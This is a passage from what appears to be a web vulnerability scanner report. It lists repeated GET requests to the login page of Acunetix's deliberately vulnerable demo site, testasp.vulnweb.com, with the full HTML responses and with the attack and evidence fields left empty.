Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> 